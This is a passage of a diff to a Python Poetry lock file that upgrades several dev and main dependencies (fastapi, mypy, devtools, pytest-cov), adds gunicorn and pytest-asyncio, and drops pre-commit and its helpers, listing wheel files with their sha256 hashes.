+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21fa558996782fc226b529fdd2ed7866c2c6ec91cee82735c98a197fae39f706"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f6c7a8a57e9405cad7485f4c9d3172ae486cfef1344b5ddd8e5239582d7355e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ac3775e3311661d4adace3697a52ac0bab17edd166087d493b52d4f4f553f9f0"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:10c93628d7497c81686e8e5e557aafa78f230cd9e77dd0c40032ef90c18f2230"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:6f4f4668e1831850ebcc2fd0b1cd11721947b6dc7c00bf1c6bd3c929ae14f2c7"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0be65ccf618c1e7ac9b849c315cc2e8a8751d9cfdaa43027d4f6624bd587ab7e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:53d0a3fa5f8af98a1e261de6a3943ca631c526635eb5817a87a59d9a57ebf48f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-win32.whl", hash = "sha256:a04f86f41a8916fe45ac5024ec477f41f886b3c435da2d4e3d2709b22ab02af1"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:830d2948a5ec37c386d3170c483063798d7879037492540f10a475e3fd6f244b"},
+ {file = "charset_normalizer-3.1.0-py3-none-any.whl", hash = "sha256:3d9098b479e78c85080c98e1e35ff40b4a31d8953102bb0fd7d1b6f8a2111a3d"},
]
[[package]]
@@ -333,35 +322,23 @@ toml = ["tomli"]
[[package]]
name = "devtools"
-version = "0.9.0"
+version = "0.10.0"
description = "Python's missing debug print command, and more."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "devtools-0.9.0-py3-none-any.whl", hash = "sha256:689cf4e7c75024237c42093ba19f4fa9cf15980269f02463aeab4d97d4b0a215"},
- {file = "devtools-0.9.0.tar.gz", hash = "sha256:86ede6e0273e023db766344d14098228785b48a80f31716f28e8b9453d52fa1e"},
+ {file = "devtools-0.10.0-py3-none-any.whl", hash = "sha256:b0bc02043bb032cdfb93e227226e2fea1aaea8f5a31fca25fabc4eadca22f228"},
+ {file = "devtools-0.10.0.tar.gz", hash = "sha256:6eb7c4fa7c4b90e5cfe623537a9961d1dc3199d8be0981802c6931cd8f02418f"},
]
[package.dependencies]
asttokens = ">=2.0.0,<3.0.0"
-executing = ">=0.8.0,<1.0.0"
+executing = ">=1.1.1"
[package.extras]
pygments = ["pygments (>=2.2.0)"]
-[[package]]
-name = "distlib"
-version = "0.3.6"
-description = "Distribution utilities"
-category = "dev"
-optional = false
-python-versions = "*"
-files = [
- {file = "distlib-0.3.6-py2.py3-none-any.whl", hash = "sha256:f35c4b692542ca110de7ef0bea44d73981caeb34ca0b9b6b2e6d7790dda8f80e"},
- {file = "distlib-0.3.6.tar.gz", hash = "sha256:14bad2d9b04d3a36127ac97f30b12a19268f211063d8f8ee4f47108896e11b46"},
-]
-
[[package]]
name = "exceptiongroup"
version = "1.1.0"
@@ -379,26 +356,29 @@ test = ["pytest (>=6)"]
[[package]]
name = "executing"
-version = "0.10.0"
+version = "1.2.0"
description = "Get the currently executing AST node of a frame, and other information"
category = "dev"
optional = false
python-versions = "*"
files = [
- {file = "executing-0.10.0-py2.py3-none-any.whl", hash = "sha256:9c745f80cda11eb22b62cbecf21156491a794eb56ab06f9d286a44e62822b24e"},
- {file = "executing-0.10.0.tar.gz", hash = "sha256:d1cd87c2e371e9966261410c5b3769d6df2f9e4a79a83eebd2662dd3388f9833"},
+ {file = "executing-1.2.0-py2.py3-none-any.whl", hash = "sha256:0314a69e37426e3608aada02473b4161d4caf5a4b244d1d0c48072b8fee7bacc"},
+ {file = "executing-1.2.0.tar.gz", hash = "sha256:19da64c18d2d851112f09c287f8d3dbbdf725ab0e569077efb6cdcbd3497c107"},
]
+[package.extras]
+tests = ["asttokens", "littleutils", "pytest", "rich"]
+
[[package]]
name = "fastapi"
-version = "0.92.0"
+version = "0.93.0"
description = "FastAPI framework, high performance, easy to learn, fast to code, ready for production"
category = "main"
optional = false
python-versions = ">=3.7"
files = [
- {file = "fastapi-0.92.0-py3-none-any.whl", hash = "sha256:ae7b97c778e2f2ec3fb3cb4fb14162129411d99907fb71920f6d69a524340ebf"},
- {file = "fastapi-0.92.0.tar.gz", hash = "sha256:023a0f5bd2c8b2609014d3bba1e14a1d7df96c6abea0a73070621c9862b9a4de"},
+ {file = "fastapi-0.93.0-py3-none-any.whl", hash = "sha256:d6e6db5f096d67b475e2a09e1124983554f634fad50297de85fc3de0583df13a"},
+ {file = "fastapi-0.93.0.tar.gz", hash = "sha256:c2944febec6da706f4c82cdfa0de48afda960c8fbde29dec88697d55a67d7718"},
]
[package.dependencies]
@@ -408,25 +388,9 @@ starlette = ">=0.25.0,<0.26.0"
[package.extras]
all = ["email-validator (>=1.1.1)", "httpx (>=0.23.0)", "itsdangerous (>=1.1.0)", "jinja2 (>=2.11.2)", "orjson (>=3.2.1)", "python-multipart (>=0.0.5)", "pyyaml (>=5.3.1)", "ujson (>=4.0.1,!=4.0.2,!=4.1.0,!=4.2.0,!=4.3.0,!=5.0.0,!=5.1.0)", "uvicorn[standard] (>=0.12.0)"]
dev = ["pre-commit (>=2.17.0,<3.0.0)", "ruff (==0.0.138)", "uvicorn[standard] (>=0.12.0,<0.21.0)"]
-doc = ["mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-markdownextradata-plugin (>=0.1.7,<0.3.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pyyaml (>=5.3.1,<7.0.0)", "typer[all] (>=0.6.1,<0.8.0)"]
+doc = ["mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-markdownextradata-plugin (>=0.1.7,<0.3.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pyyaml (>=5.3.1,<7.0.0)", "typer-cli (>=0.0.13,<0.0.14)", "typer[all] (>=0.6.1,<0.8.0)"]
test = ["anyio[trio] (>=3.2.1,<4.0.0)", "black (==22.10.0)", "coverage[toml] (>=6.5.0,<8.0)", "databases[sqlite] (>=0.3.2,<0.7.0)", "email-validator (>=1.1.1,<2.0.0)", "flask (>=1.1.2,<3.0.0)", "httpx (>=0.23.0,<0.24.0)", "isort (>=5.0.6,<6.0.0)", "mypy (==0.982)", "orjson (>=3.2.1,<4.0.0)", "passlib[bcrypt] (>=1.7.2,<2.0.0)", "peewee (>=3.13.3,<4.0.0)", "pytest (>=7.1.3,<8.0.0)", "python-jose[cryptography] (>=3.3.0,<4.0.0)", "python-multipart (>=0.0.5,<0.0.6)", "pyyaml (>=5.3.1,<7.0.0)", "ruff (==0.0.138)", "sqlalchemy (>=1.3.18,<1.4.43)", "types-orjson (==3.6.2)", "types-ujson (==5.6.0.0)", "ujson (>=4.0.1,!=4.0.2,!=4.1.0,!=4.2.0,!=4.3.0,!=5.0.0,!=5.1.0,<6.0.0)"]
-[[package]]
-name = "filelock"
-version = "3.9.0"
-description = "A platform independent file lock."
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "filelock-3.9.0-py3-none-any.whl", hash = "sha256:f58d535af89bb9ad5cd4df046f741f8553a418c01a7856bf0d173bbc9f6bd16d"},
- {file = "filelock-3.9.0.tar.gz", hash = "sha256:7b319f24340b51f55a2bf7a12ac0755a9b03e718311dac567a0f4f7fabd2f5de"},
-]
-
-[package.extras]
-docs = ["furo (>=2022.12.7)", "sphinx (>=5.3)", "sphinx-autodoc-typehints (>=1.19.5)"]
-testing = ["covdefaults (>=2.2.2)", "coverage (>=7.0.1)", "pytest (>=7.2)", "pytest-cov (>=4)", "pytest-timeout (>=2.1)"]
-
[[package]]
name = "flake8"
version = "5.0.4"
@@ -445,6 +409,27 @@ mccabe = ">=0.7.0,<0.8.0"
pycodestyle = ">=2.9.0,<2.10.0"
pyflakes = ">=2.5.0,<2.6.0"
+[[package]]
+name = "gunicorn"
+version = "20.1.0"
+description = "WSGI HTTP Server for UNIX"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+files = [
+ {file = "gunicorn-20.1.0-py3-none-any.whl", hash = "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e"},
+ {file = "gunicorn-20.1.0.tar.gz", hash = "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8"},
+]
+
+[package.dependencies]
+setuptools = ">=3.0"
+
+[package.extras]
+eventlet = ["eventlet (>=0.24.1)"]
+gevent = ["gevent (>=1.4.0)"]
+setproctitle = ["setproctitle"]
+tornado = ["tornado (>=0.2)"]
+
[[package]]
name = "h11"
version = "0.14.0"
@@ -506,21 +491,6 @@ cli = ["click (>=8.0.0,<9.0.0)", "pygments (>=2.0.0,<3.0.0)", "rich (>=10,<13)"]
http2 = ["h2 (>=3,<5)"]
socks = ["socksio (>=1.0.0,<2.0.0)"]
-[[package]]
-name = "identify"
-version = "2.5.18"
-description = "File identification library for Python"
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "identify-2.5.18-py2.py3-none-any.whl", hash = "sha256:93aac7ecf2f6abf879b8f29a8002d3c6de7086b8c28d88e1ad15045a15ab63f9"},
- {file = "identify-2.5.18.tar.gz", hash = "sha256:89e144fa560cc4cffb6ef2ab5e9fb18ed9f9b3cb054384bab4b95c12f6c309fe"},
-]
-
-[package.extras]
-license = ["ukkonen"]
-
[[package]]
name = "idna"
version = "3.4"
@@ -597,45 +567,49 @@ files = [
[[package]]
name = "mypy"
-version = "0.971"
+version = "1.1.1"
description = "Optional static typing for Python"
category = "dev"
optional = false
-python-versions = ">=3.6"
+python-versions = ">=3.7"
files = [
- {file = "mypy-0.971-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:f2899a3cbd394da157194f913a931edfd4be5f274a88041c9dc2d9cdcb1c315c"},
- {file = "mypy-0.971-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:98e02d56ebe93981c41211c05adb630d1d26c14195d04d95e49cd97dbc046dc5"},
- {file = "mypy-0.971-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:19830b7dba7d5356d3e26e2427a2ec91c994cd92d983142cbd025ebe81d69cf3"},
- {file = "mypy-0.971-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:02ef476f6dcb86e6f502ae39a16b93285fef97e7f1ff22932b657d1ef1f28655"},
- {file = "mypy-0.971-cp310-cp310-win_amd64.whl", hash = "sha256:25c5750ba5609a0c7550b73a33deb314ecfb559c350bb050b655505e8aed4103"},
- {file = "mypy-0.971-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:d3348e7eb2eea2472db611486846742d5d52d1290576de99d59edeb7cd4a42ca"},
- {file = "mypy-0.971-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:3fa7a477b9900be9b7dd4bab30a12759e5abe9586574ceb944bc29cddf8f0417"},
- {file = "mypy-0.971-cp36-cp36m-win_amd64.whl", hash = "sha256:2ad53cf9c3adc43cf3bea0a7d01a2f2e86db9fe7596dfecb4496a5dda63cbb09"},
- {file = "mypy-0.971-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:855048b6feb6dfe09d3353466004490b1872887150c5bb5caad7838b57328cc8"},
- {file = "mypy-0.971-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:23488a14a83bca6e54402c2e6435467a4138785df93ec85aeff64c6170077fb0"},
- {file = "mypy-0.971-cp37-cp37m-win_amd64.whl", hash = "sha256:4b21e5b1a70dfb972490035128f305c39bc4bc253f34e96a4adf9127cf943eb2"},
- {file = "mypy-0.971-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:9796a2ba7b4b538649caa5cecd398d873f4022ed2333ffde58eaf604c4d2cb27"},
- {file = "mypy-0.971-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5a361d92635ad4ada1b1b2d3630fc2f53f2127d51cf2def9db83cba32e47c856"},
- {file = "mypy-0.971-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b793b899f7cf563b1e7044a5c97361196b938e92f0a4343a5d27966a53d2ec71"},
- {file = "mypy-0.971-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d1ea5d12c8e2d266b5fb8c7a5d2e9c0219fedfeb493b7ed60cd350322384ac27"},
- {file = "mypy-0.971-cp38-cp38-win_amd64.whl", hash = "sha256:23c7ff43fff4b0df93a186581885c8512bc50fc4d4910e0f838e35d6bb6b5e58"},
- {file = "mypy-0.971-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:1f7656b69974a6933e987ee8ffb951d836272d6c0f81d727f1d0e2696074d9e6"},
- {file = "mypy-0.971-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d2022bfadb7a5c2ef410d6a7c9763188afdb7f3533f22a0a32be10d571ee4bbe"},
- {file = "mypy-0.971-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ef943c72a786b0f8d90fd76e9b39ce81fb7171172daf84bf43eaf937e9f220a9"},
- {file = "mypy-0.971-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d744f72eb39f69312bc6c2abf8ff6656973120e2eb3f3ec4f758ed47e414a4bf"},
- {file = "mypy-0.971-cp39-cp39-win_amd64.whl", hash = "sha256:77a514ea15d3007d33a9e2157b0ba9c267496acf12a7f2b9b9f8446337aac5b0"},
- {file = "mypy-0.971-py3-none-any.whl", hash = "sha256:0d054ef16b071149917085f51f89555a576e2618d5d9dd70bd6eea6410af3ac9"},
- {file = "mypy-0.971.tar.gz", hash = "sha256:40b0f21484238269ae6a57200c807d80debc6459d444c0489a102d7c6a75fa56"},
+ {file = "mypy-1.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:39c7119335be05630611ee798cc982623b9e8f0cff04a0b48dfc26100e0b97af"},
+ {file = "mypy-1.1.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:61bf08362e93b6b12fad3eab68c4ea903a077b87c90ac06c11e3d7a09b56b9c1"},
+ {file = "mypy-1.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dbb19c9f662e41e474e0cff502b7064a7edc6764f5262b6cd91d698163196799"},
+ {file = "mypy-1.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:315ac73cc1cce4771c27d426b7ea558fb4e2836f89cb0296cbe056894e3a1f78"},
+ {file = "mypy-1.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:5cb14ff9919b7df3538590fc4d4c49a0f84392237cbf5f7a816b4161c061829e"},
+ {file = "mypy-1.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:26cdd6a22b9b40b2fd71881a8a4f34b4d7914c679f154f43385ca878a8297389"},
+ {file = "mypy-1.1.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:5b5f81b40d94c785f288948c16e1f2da37203c6006546c5d947aab6f90aefef2"},
+ {file = "mypy-1.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21b437be1c02712a605591e1ed1d858aba681757a1e55fe678a15c2244cd68a5"},
+ {file = "mypy-1.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d809f88734f44a0d44959d795b1e6f64b2bbe0ea4d9cc4776aa588bb4229fc1c"},
+ {file = "mypy-1.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:a380c041db500e1410bb5b16b3c1c35e61e773a5c3517926b81dfdab7582be54"},
+ {file = "mypy-1.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b7c7b708fe9a871a96626d61912e3f4ddd365bf7f39128362bc50cbd74a634d5"},
+ {file = "mypy-1.1.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c1c10fa12df1232c936830839e2e935d090fc9ee315744ac33b8a32216b93707"},
+ {file = "mypy-1.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:0a28a76785bf57655a8ea5eb0540a15b0e781c807b5aa798bd463779988fa1d5"},
+ {file = "mypy-1.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:ef6a01e563ec6a4940784c574d33f6ac1943864634517984471642908b30b6f7"},
+ {file = "mypy-1.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:d64c28e03ce40d5303450f547e07418c64c241669ab20610f273c9e6290b4b0b"},
+ {file = "mypy-1.1.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:64cc3afb3e9e71a79d06e3ed24bb508a6d66f782aff7e56f628bf35ba2e0ba51"},
+ {file = "mypy-1.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ce61663faf7a8e5ec6f456857bfbcec2901fbdb3ad958b778403f63b9e606a1b"},
+ {file = "mypy-1.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2b0c373d071593deefbcdd87ec8db91ea13bd8f1328d44947e88beae21e8d5e9"},
+ {file = "mypy-1.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:2888ce4fe5aae5a673386fa232473014056967f3904f5abfcf6367b5af1f612a"},
+ {file = "mypy-1.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:19ba15f9627a5723e522d007fe708007bae52b93faab00f95d72f03e1afa9598"},
+ {file = "mypy-1.1.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:59bbd71e5c58eed2e992ce6523180e03c221dcd92b52f0e792f291d67b15a71c"},
+ {file = "mypy-1.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9401e33814cec6aec8c03a9548e9385e0e228fc1b8b0a37b9ea21038e64cdd8a"},
+ {file = "mypy-1.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4b398d8b1f4fba0e3c6463e02f8ad3346f71956b92287af22c9b12c3ec965a9f"},
+ {file = "mypy-1.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:69b35d1dcb5707382810765ed34da9db47e7f95b3528334a3c999b0c90fe523f"},
+ {file = "mypy-1.1.1-py3-none-any.whl", hash = "sha256:4e4e8b362cdf99ba00c2b218036002bdcdf1e0de085cdb296a49df03fb31dfc4"},
+ {file = "mypy-1.1.1.tar.gz", hash = "sha256:ae9ceae0f5b9059f33dbc62dea087e942c0ccab4b7a003719cb70f9b8abfa32f"},
]
[package.dependencies]
-mypy-extensions = ">=0.4.3"
+mypy-extensions = ">=1.0.0"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typed-ast = {version = ">=1.4.0,<2", markers = "python_version < \"3.8\""}
typing-extensions = ">=3.10"
[package.extras]
dmypy = ["psutil (>=4.0)"]
+install-types = ["pip"]
python2 = ["typed-ast (>=1.4.0,<2)"]
reports = ["lxml"]
@@ -651,21 +625,6 @@ files = [
{file = "mypy_extensions-1.0.0.tar.gz", hash = "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782"},
]
-[[package]]
-name = "nodeenv"
-version = "1.7.0"
-description = "Node.js virtual environment builder"
-category = "dev"
-optional = false
-python-versions = ">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*"
-files = [
- {file = "nodeenv-1.7.0-py2.py3-none-any.whl", hash = "sha256:27083a7b96a25f2f5e1d8cb4b6317ee8aeda3bdd121394e5ac54e498028a042e"},
- {file = "nodeenv-1.7.0.tar.gz", hash = "sha256:e0e7f7dfb85fc5394c6fe1e8fa98131a2473e04311a45afb6508f7cf1836fa2b"},
-]
-
-[package.dependencies]
-setuptools = "*"
-
[[package]]
name = "packaging"
version = "23.0"
@@ -692,22 +651,22 @@ files = [
[[package]]
name = "platformdirs"
-version = "2.6.2"
+version = "3.1.0"
description = "A small Python package for determining appropriate platform-specific dirs, e.g. a \"user data dir\"."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "platformdirs-2.6.2-py3-none-any.whl", hash = "sha256:83c8f6d04389165de7c9b6f0c682439697887bca0aa2f1c87ef1826be3584490"},
- {file = "platformdirs-2.6.2.tar.gz", hash = "sha256:e1fea1fe471b9ff8332e229df3cb7de4f53eeea4998d3b6bfff542115e998bd2"},
+ {file = "platformdirs-3.1.0-py3-none-any.whl", hash = "sha256:13b08a53ed71021350c9e300d4ea8668438fb0046ab3937ac9a29913a1a1350a"},
+ {file = "platformdirs-3.1.0.tar.gz", hash = "sha256:accc3665857288317f32c7bebb5a8e482ba717b474f3fc1d18ca7f9214be0cef"},
]
[package.dependencies]
typing-extensions = {version = ">=4.4", markers = "python_version < \"3.8\""}
[package.extras]
-docs = ["furo (>=2022.12.7)", "proselint (>=0.13)", "sphinx (>=5.3)", "sphinx-autodoc-typehints (>=1.19.5)"]
-test = ["appdirs (==1.4.4)", "covdefaults (>=2.2.2)", "pytest (>=7.2)", "pytest-cov (>=4)", "pytest-mock (>=3.10)"]
+docs = ["furo (>=2022.12.7)", "proselint (>=0.13)", "sphinx (>=6.1.3)", "sphinx-autodoc-typehints (>=1.22,!=1.23.4)"]
+test = ["appdirs (==1.4.4)", "covdefaults (>=2.2.2)", "pytest (>=7.2.1)", "pytest-cov (>=4)", "pytest-mock (>=3.10)"]
[[package]]
name = "pluggy"
@@ -728,26 +687,6 @@ importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
dev = ["pre-commit", "tox"]
testing = ["pytest", "pytest-benchmark"]
-[[package]]
-name = "pre-commit"
-version = "2.21.0"
-description = "A framework for managing and maintaining multi-language pre-commit hooks."
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "pre_commit-2.21.0-py2.py3-none-any.whl", hash = "sha256:e2f91727039fc39a92f58a588a25b87f936de6567eed4f0e673e0507edc75bad"},
- {file = "pre_commit-2.21.0.tar.gz", hash = "sha256:31ef31af7e474a8d8995027fefdfcf509b5c913ff31f2015b4ec4beb26a6f658"},
-]
-
-[package.dependencies]
-cfgv = ">=2.0.0"
-identify = ">=1.0.0"
-importlib-metadata = {version = "*", markers = "python_version < \"3.8\""}
-nodeenv = ">=0.11.1"
-pyyaml = ">=5.1"
-virtualenv = ">=20.10.0"
-
[[package]]
name = "prometheus-client"
version = "0.16.0"
@@ -865,16 +804,36 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras]
testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "xmlschema"]
+[[package]]
+name = "pytest-asyncio"
+version = "0.20.3"
+description = "Pytest support for asyncio"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "pytest-asyncio-0.20.3.tar.gz", hash = "sha256:83cbf01169ce3e8eb71c6c278ccb0574d1a7a3bb8eaaf5e50e0ad342afb33b36"},
+ {file = "pytest_asyncio-0.20.3-py3-none-any.whl", hash = "sha256:f129998b209d04fcc65c96fc85c11e5316738358909a8399e93be553d7656442"},
+]
+
+[package.dependencies]
+pytest = ">=6.1.0"
+typing-extensions = {version = ">=3.7.2", markers = "python_version < \"3.8\""}
+
+[package.extras]
+docs = ["sphinx (>=5.3)", "sphinx-rtd-theme (>=1.0)"]
+testing = ["coverage (>=6.2)", "flaky (>=3.5.0)", "hypothesis (>=5.7.1)", "mypy (>=0.931)", "pytest-trio (>=0.7.0)"]
+
[[package]]
name = "pytest-cov"
-version = "3.0.0"
+version = "4.0.0"
description = "Pytest plugin for measuring coverage."
category = "dev"
optional = false
python-versions = ">=3.6"
files = [
- {file = "pytest-cov-3.0.0.tar.gz", hash = "sha256:e7f0f5b1617d2210a2cabc266dfe2f4c75a8d32fb89eafb7ad9d06f6d076d470"},
- {file = "pytest_cov-3.0.0-py3-none-any.whl", hash = "sha256:578d5d15ac4a25e5f961c938b85a05b09fdaae9deef3bb6de9a6e766622ca7a6"},
+ {file = "pytest-cov-4.0.0.tar.gz", hash = "sha256:996b79efde6433cdbd0088872dbc5fb3ed7fe1578b68cdbba634f14bb8dd0470"},
+ {file = "pytest_cov-4.0.0-py3-none-any.whl", hash = "sha256:2feb1b751d66a8bd934e5edfa2e961d11309dc37b73b0eabe73b5945fee20f6b"},
]
[package.dependencies]
@@ -908,56 +867,6 @@ gendocs = ["pytoolconfig[doc]", "sphinx (>=4.5.0)", "sphinx-autodoc-typehints (>
global = ["platformdirs (>=1.4.4)"]
validation = ["pydantic (>=1.7.4)"]
-[[package]]
-name = "pyyaml"
-version = "6.0"
-description = "YAML parser and emitter for Python"
-category = "dev"
-optional = false
-python-versions = ">=3.6"
-files = [
- {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"},
- {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"},
- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"},
- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"},
- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"},
- {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"},
- {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"},
- {file = "PyYAML-6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d4b0ba9512519522b118090257be113b9468d804b19d63c71dbcf4a48fa32358"},
- {file = "PyYAML-6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:81957921f441d50af23654aa6c5e5eaf9b06aba7f0a19c18a538dc7ef291c5a1"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afa17f5bc4d1b10afd4466fd3a44dc0e245382deca5b3c353d8b757f9e3ecb8d"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:dbad0e9d368bb989f4515da330b88a057617d16b6a8245084f1b05400f24609f"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:432557aa2c09802be39460360ddffd48156e30721f5e8d917f01d31694216782"},
- {file = "PyYAML-6.0-cp311-cp311-win32.whl", hash = "sha256:bfaef573a63ba8923503d27530362590ff4f576c626d86a9fed95822a8255fd7"},
- {file = "PyYAML-6.0-cp311-cp311-win_amd64.whl", hash = "sha256:01b45c0191e6d66c470b6cf1b9531a771a83c1c4208272ead47a3ae4f2f603bf"},
- {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"},
- {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"},
- {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"},
- {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"},
